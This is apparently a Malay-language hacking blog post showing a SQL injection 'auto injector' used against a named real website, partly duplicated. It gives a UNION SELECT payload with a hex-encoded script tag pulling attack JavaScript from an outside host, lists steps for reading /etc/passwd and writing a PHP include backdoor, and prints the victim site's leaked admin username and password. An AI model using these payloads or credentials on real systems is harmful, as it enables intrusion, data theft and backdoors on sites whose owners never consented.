Assalamualaikum dan salam sejahtera otai2 semua 
, kali ni Joker nk kgsi sikit je "Basic SQL TOOL Auto Injector v1.0", tools ni agak menarik bt Joker 
kerana ia melalui URL target code query dan string Parameter valid ID no sahaja dan kita seperti berada di shell/backdoor :* yg telah kita upload ke server target o.O?. Beberapa fungsi dlm shell JS ini.
######################################
1. explore DB(s) = information_schema exist
2. read files = load file "/etc/passwd" FPD & bruteforce
3. write files = FPD <?php include $_GET[i]; ?>
4. select query = use hexa(string) to print strings
5. injections = kommand SQLi yg terdedah pada web tersebut
######################################
Step 1
Web target vuln SQLi yg telah kita jmpa total column dan valid no ID.
Live Demo
http://1-net.com.sg/newsroomdetail.php?c...0,11,12--+
, kali ni Joker nk kgsi sikit je "Basic SQL TOOL Auto Injector v1.0", tools ni agak menarik bt Joker kerana ia melalui URL target code query dan string Parameter valid ID no sahaja dan kita seperti berada di shell/backdoor :* yg telah kita upload ke server target o.O?. Beberapa fungsi dlm shell JS ini.######################################
1. explore DB(s) = information_schema exist
2. read files = load file "/etc/passwd" FPD & bruteforce
3. write files = FPD <?php include $_GET[i]; ?>
4. select query = use hexa(string) to print strings
5. injections = kommand SQLi yg terdedah pada web tersebut
######################################
Step 1
Web target vuln SQLi yg telah kita jmpa total column dan valid no ID.
Live Demo
http://1-net.com.sg/newsroomdetail.php?c...0,11,12--+
Spoiler :
![[Image: 7cf31d9200.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vp0U-kVFXbcnhl9j4PqGb_IyVR6r2RaE3RciSSDV_Ii1mmsGTtIcindbncHwyBk4qcsa8qi6wUNyf25c-S0kcEWYXdx-CokA=s0-d)
=========================================#
Step 2
jadikan large SQLi di atas seperti ini --> newsid=-26+UNION+ALL+SELECT+0x31,0x32,((0x3c736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E)),0x34,0x35,0x36,0x37,0x38,0x39,0x310,0x311,0x312--+
Live Demo
http://1-net.com.sg/newsroomdetail.php?c...1,0x312--+
Spoiler :
![[Image: f5de86d02f.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v91dmjy0SmZjbAQ6nuPdkNFMwhKqkUbQEdYld2ERvz1u_Z1jtU1WimAuVGRzYp3wM8Y3aFSibJTpPrHBDcmwzASgHVlwQ4Rw=s0-d)
=========================================#
Step 3
BINGO!!
:AdminId:AName:APassword:Allow:
:1:onenet_admin:1netadmin_cms:Y:
Spoiler :
![[Image: 489bcb663a.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u3vJ0IJa7Ypyc36tPDtOoRjNPAvirPZUC7__PkdyjmzE3UfFvNZ9co5bLSSop5ia8nnvqF8VgfyIT1j08RRVEwn8CRkDWkdA=s0-d)
=========================================#
INFO :-
0x31 = 1
0x310 = 10
http://www.piclist.com/techref/ascii.htm
Code:
script src='http://www.jabarprov.go.id/root/profil/sql.js'></script>^--yang perlu di Convertkan menhadi HEX string
((0x3cASCII text yang telah di Convert menjadi HEX string))
Hasil Convert : 736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E
Jadikan seperti ni --> ((0x3c736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E))
Learn To Hack NOT Hack To Learn.
pandai2 la putar belitkan diri anda yg sebenarnya
No comments:
Post a Comment